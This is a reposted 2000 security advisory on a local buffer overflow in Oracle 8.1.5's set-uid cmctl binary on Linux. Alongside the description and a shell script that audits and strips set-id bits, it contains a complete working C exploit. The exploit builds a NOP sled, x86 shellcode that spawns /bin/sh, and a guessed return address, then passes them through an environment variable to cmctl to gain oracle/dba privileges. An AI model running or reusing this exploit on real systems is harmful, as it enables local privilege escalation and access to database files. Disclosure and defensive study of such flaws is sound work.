SECURITYVULNS:DOC:951
Nov 20, 2000 - 12:00 a.m.

Vulnerability in Connection Manager Control binary in Oracle 8.1.5, Linux platform.


Hello Elias,

    Could you make public this advisory? Oracle people don't send an
answer in 6 days. Please cut these lines.

                                                            Thanks




                  WWW.PLAZASITE.COM
              System & Security Division

Title: Vulnerability in cmctl in Oracle 8.1.5
Date: 13-11-2000
Platform: Only tested on Linux, but can be exported to others.
Impact: Any local user can gain euid=oracle and egid=dba.
Author: Juan Manuel Pascual ([email protected])
Status: Vendor Contacted. Details Below

OVERVIEW:

cmctl is the Connection Manager Control binary shipped with Oracle 8.1.5. In the affected installation it runs set-uid oracle and set-gid dba, which is why a local overflow in it yields those privileges.

PROBLEM SUMMARY:

There is a buffer overflow in cmctl that can be used by local users to
obtain the euid of the oracle user and the egid of dba. With the default
installation, the oracle user owns all database files.

IMPACT:

Any user with local access can gain euid=oracle and egid=dba.

SOLUTION:

Maybe a chmod -s ;-)))).
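The workaround above is to clear the set-id bits. What follows is an added example, not part of the advisory: a small POSIX shell audit that lists the set-uid/set-gid binaries under an Oracle bin directory and can apply the same chmod -s to them. The default directory is the cmctl path quoted in the exploit's BINARY define and is an assumption about the install layout.

```shell
#!/bin/sh
# Added example (not part of the advisory): audit a directory for set-uid /
# set-gid binaries and apply the advisory's workaround (chmod -s) to them.
# The default path is the cmctl location quoted in the advisory; it is an
# assumption about the install layout and should be adjusted locally.
ORACLE_BIN_DEFAULT="/usr/local/oracle8i/app/oracle/product/8.1.5/bin"

# Print every regular file under DIR (default: ORACLE_BIN_DEFAULT) that has
# the set-uid (4000) or set-gid (2000) bit set, one path per line.
list_setid_binaries() {
    find "${1:-$ORACLE_BIN_DEFAULT}" -type f \
        \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Print the number of such files; suitable for a periodic check that
# nothing regained a set-id bit after a patch or reinstall.
count_setid_binaries() {
    list_setid_binaries "$1" | wc -l | tr -d ' '
}

# Show mode, owner and group for each hit so the DBA can see which
# binaries would hand euid=oracle / egid=dba to any local user.
report_setid_binaries() {
    list_setid_binaries "$1" | while IFS= read -r f; do
        ls -ld "$f"
    done
}

# Strip the set-uid and set-gid bits from every file found (same effect as
# the advisory's "chmod -s"). Afterwards cmctl runs with the caller's own
# privileges, so only the oracle account or root can administer it; that
# is the trade-off the workaround accepts.
strip_setid_bits() {
    list_setid_binaries "$1" | while IFS= read -r f; do
        chmod ug-s "$f" && echo "stripped set-id bits from $f"
    done
}

# Report-only when run with a directory argument; call strip_setid_bits
# explicitly to change anything.
if [ "$#" -gt 0 ]; then
    report_setid_binaries "$1"
fi
```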

STATUS:

Vendor was contacted 13/11. No answers were received in the last
4 days.


This vulnerability was researched by:
Juan Manuel Pascual Escriba [email protected]

/*
Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested it on RH 6.2
and 6.1. It is possible to export it to other platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact: any user gains euid=oracle and egid=dba.

Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
others.
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen() */

#define DEFAULT_OFFSET 1
#define DEFAULT_BUFFER_SIZE 350
#define NOP 0x90
/* cmctl is started through system(), so the shell expands $pakito (the
 * environment variable that carries the buffer) into the argument that
 * overflows cmctl's fixed-size buffer. */
#define BINARY "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl echo $pakito"

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Current stack pointer; 32-bit x86 only (the value is left in %eax,
 * which is the return register on that ABI). */
unsigned long get_sp(void) {
asm("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;

if (argc > 1) offset = atoi(argv[1]);
else
{
printf("Use ./cmctl_start Offset\n");
exit(1);
}

/* Fill the whole buffer with the guessed return address (sp - offset).
 * The loop writes whole 4-byte words, so allocate one word of slack. */
buff = malloc(bsize + sizeof(long));
addr = get_sp() - offset;
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

/* First half becomes a NOP sled ... */
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

/* ... with the shellcode centred in the buffer. */
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
setenv("pakito",buff,1);

system(BINARY);
return 0;
}

            " In God We trust, Others We monitor "

    -------------------------------------------------------------
     Juan Manuel Pascual Escribá        Systems Administrator
     PlazaSite S.A.                         c/ Tomás Bretón 32-38
     08950 Esplugues de Llobregat           (Barcelona),    SPAIN
     Ph: +34 93 3717398                       Fax: +34 93 3711968
     mob: 667591142                     Email: [email protected]
    -------------------------------------------------------------